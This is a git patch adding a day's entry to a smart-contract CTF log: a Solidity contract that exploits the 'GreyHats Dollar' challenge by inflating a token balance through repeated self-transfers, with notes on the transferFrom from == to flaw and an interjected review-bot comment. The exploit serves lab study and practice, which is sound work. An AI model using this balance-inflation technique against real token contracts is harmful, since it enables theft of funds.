From 27d7987e8b20e54eb42c53976a1c268917c2747d Mon Sep 17 00:00:00 2001
From: doublespending
Date: Sat, 21 Sep 2024 15:00:06 +0800
Subject: [PATCH] Add day24 of doublespending
---
 .../doublespending/day24/greyhats-dollar.sol | 31 +++++++++++++++++++
 doublespending.md | 10 ++++++
 2 files changed, 41 insertions(+)
 create mode 100644 Writeup/doublespending/day24/greyhats-dollar.sol
diff --git a/Writeup/doublespending/day24/greyhats-dollar.sol b/Writeup/doublespending/day24/greyhats-dollar.sol
new file mode 100644
index 00000000..dd34c9ac
--- /dev/null
+++ b/Writeup/doublespending/day24/greyhats-dollar.sol
@@ -0,0 +1,31 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity 0.8.15;
+
+import { Setup } from "src/greyhats-dollar/Setup.sol";
+
+contract Exploit {
+ Setup setup;
+
+ constructor(Setup _setup) {
+ setup = _setup;
+ }
+
+ function solve() external {
+ // Claim 1000 GREY
+ setup.claim();
+
+ // Mint 1000 GHD using 1000 GREY
+ setup.grey().approve(address(setup.ghd()), 1000e18);
+ setup.ghd().mint(1000e18);
+
+ // Transfer GHD to ourselves until we have 50,000 GHD
+ uint256 balance = setup.ghd().balanceOf(address(this));
+ while (balance < 50_000e18) {
+ setup.ghd().transfer(address(this), balance);
+ balance = setup.ghd().balanceOf(address(this));
+ }
+
+ // Transfer all GHD to msg.sender
+ setup.ghd().transfer(msg.sender, balance);
+ }
+}
\ No newline at end of file
diff --git a/doublespending.md b/doublespending.md
index 6013028c..76c8e5cc 100644
--- a/doublespending.md
+++ b/doublespending.md
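Review bot: `solve()` in the new `Exploit` contract is `external` with no caller check, so once the contract is deployed anyone can call it and the final `setup.ghd().transfer(msg.sender, balance)` pays the whole GHD balance to that caller rather than to the deployer; if the challenge scores the balance of whoever triggered the solve, a front-runner takes it. Record the deployer and gate the call: `address immutable owner;` in the contract body, `owner = msg.sender;` in the constructor, and `require(msg.sender == owner, "not owner");` as the first line of `solve()`. The `while` loop also only terminates if each self-transfer increases the balance, which this file states only in a comment (the accompanying writeup attributes it to `transferFrom` not handling `from == to`); should the target not behave that way the loop makes no progress and the call fails only on gas exhaustion, so a note such as `// assumes GHD.transfer(to == from) credits shares without debiting them; ~6 doublings from 1000 to >= 50_000 — confirm against GHD.sol` would make the dependency explicit.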
@@ -356,4 +356,14 @@ B: [EthTaipei CTF 2023](https://github.com/dinngo/ETHTaipei-war-room/)(5) - We should find a way to distinguish the two sequential static call. - We can use `gasleft()` - We can find a value `i` - `gasleft() % i == 0` in the first call - `gasleft() % i != 0` in the second call
+### 2024.09.21
+
+B: [Grey Cat the Flag 2024 Milotruck challs](https://github.com/MiloTruck/evm-ctf-challenges) (6)
+
+- GreyHats Dollar
+ - The share finally updates at this [line](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+ - `transferFrom` has not consider the case that `from` equals to `to`.
+ - At this case, we get [`shares[to=from] = origin + _shares`](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+ - However, the share is expected unchanged.
+